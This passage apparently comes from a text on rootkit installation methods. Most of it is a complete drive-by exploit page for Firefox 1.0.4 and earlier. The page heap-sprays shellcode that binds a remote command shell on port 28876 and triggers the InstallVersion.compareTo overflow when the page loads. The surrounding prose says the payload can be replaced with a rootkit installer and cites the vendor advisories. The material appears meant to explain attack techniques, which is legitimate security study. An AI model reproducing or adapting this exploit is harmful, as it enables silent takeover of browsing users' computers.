This is perhaps the most widely used installation technique. The following example is a web page that allows a remote connection to any computer browsing the page with Mozilla Firefox version 1.4 or earlier:.
<html> <head> <!-- Simple port bind exploit --> <title>Exploit for Mozilla Firefox version 1.04 (or Earlier)</title> <script language="javascript"> function OnLoadBody() { location.href="javascript:void (new InstallVersion());"; CrashAndBurn(); }; // This functions loads the stack with a payload and then buffer overflows function CrashAndBurn() { // Spray up to this address var heapSprayToAddress=0x12000000; // Payload - Bind port 28876 to take complete control of the caller var ShellcodeBytes = "90 90 90 90 eb 43 56 57 8b 45 3c 8b 54 05 78 01 ea 52 8b 52 20 01 " + "ea 31 c0 31 c9 41 8b 34 8a 01 ee 31 ff c1 cf 13 ac 01 c7 85 c0 75 " + "f6 39 df 75 ea 5a 8b 5a 24 01 eb 66 8b 0c 4b 8b 5a 1c 01 eb 8b 04 " + "8b 01 e8 5f 5e ff e0 fc 31 c0 64 8b 40 30 8b 40 0c 8b 70 1c ad 8b " + "68 08 31 c0 66 b8 6c 6c 50 68 33 32 2e 64 68 77 73 32 5f 54 bb 71 " + "a7 e8 fe e8 90 ff ff ff 89 ef 89 c5 81 c4 70 fe ff ff 54 31 c0 fe " + "c4 40 50 bb 22 7d ab 7d e8 75 ff ff ff 31 c0 50 50 50 50 40 50 40 " + "50 bb a6 55 34 79 e8 61 ff ff ff 89 c6 31 c0 50 50 35 02 01 70 cc " + "fe cc 50 89 e0 50 6a 10 50 56 bb 81 b4 2c be e8 42 ff ff ff 31 c0 " + "50 56 bb d3 fa 58 9b e8 34 ff ff ff 58 60 6a 10 54 50 56 bb 47 f3 " + "56 c6 e8 23 ff ff ff 89 c6 31 db 53 68 2e 63 6d 64 89 e1 41 31 db " + "56 56 56 53 53 31 c0 fe c4 40 50 53 53 53 53 53 53 53 53 53 53 6a " + "44 89 e0 53 53 53 53 54 50 53 53 53 43 53 4b 53 53 51 53 87 fd bb " + "21 d0 05 d0 e8 df fe ff ff 5b 31 c0 48 50 53 bb 43 cb 8d 5f e8 cf " + "fe ff ff 56 87 ef bb 12 6b 6d d0 e8 c2 fe ff ff 83 c4 5c 61 eb 89 "; // Use regular expressions to set unescape sequence var payLoadCode = unescape( ShellcodeBytes.replace( /\s*([0-9A-Fa-f][0-9A-Fa- f])\s*([0-9A-Fa-f][0-9A-Fa-f])/g, "%u$2$1" ) ); // Size of the heap blocks var heapBlockSize = 0x400000; // Size of the payload in bytes var payLoadSize = payLoadCode.length * 2; // Caluclate spray slides size var spraySlideSize = heapBlockSize - (payLoadSize + 0x38); // exclude header // Set first spray slide ("pdata") with "pvtbl" address - 0x11C0002C var spraySlide1 = unescape("%u002C%u11C0"); spraySlide1 = getSpraySlide(spraySlide1,spraySlideSize); var spraySlide2 = unescape("%u002C%u1200"); //0x1200002C spraySlide2 = getSpraySlide(spraySlide2,spraySlideSize); var spraySlide3 = unescape ("%u9090%u9090"); spraySlide3 = getSpraySlide( spraySlide3, spraySlideSize ); // Spray the heap heapBlocks=(heapSprayToAddress-0x400000)/heapBlockSize; memory = new Array(); for ( i = 0; i < heapBlocks; i++ ) { memory[i]=(i%3==0) ? spraySlide1 + payLoadCode: (i%3==1) ? spraySlide2 + payLoadCode: spraySlide3 + payLoadCode; } // Set address to fake "pdata". var eaxAddress = 0x1180002C; // Here's the buffer overflow! (new InstallVersion).compareTo(new Number(eaxAddress >> 1)); } function getSpraySlide( spraySlide, spraySlideSize ) { while ( spraySlide.length * 2 < spraySlideSize ) { spraySlide += spraySlide; } spraySlide = spraySlide.substring( 0, spraySlideSize / 2 ); return spraySlide; } </script> </head> <body onload="OnLoadBody()"> </body> </html>
This exploit was good throughout the year 2005. A similar GDI exploit allowed identical results with Internet Explorer 5 for the same period of time. In each case the actual payload can be swapped with a rootkit installation routine.
Here are the links to the exploits mentioned above:
www.mozilla.org/projects/security/known-vulnerabilities.html (reference MFSA 2005-50)
www.microsoft.com/technet/security/bulletin/MS04-028.mspx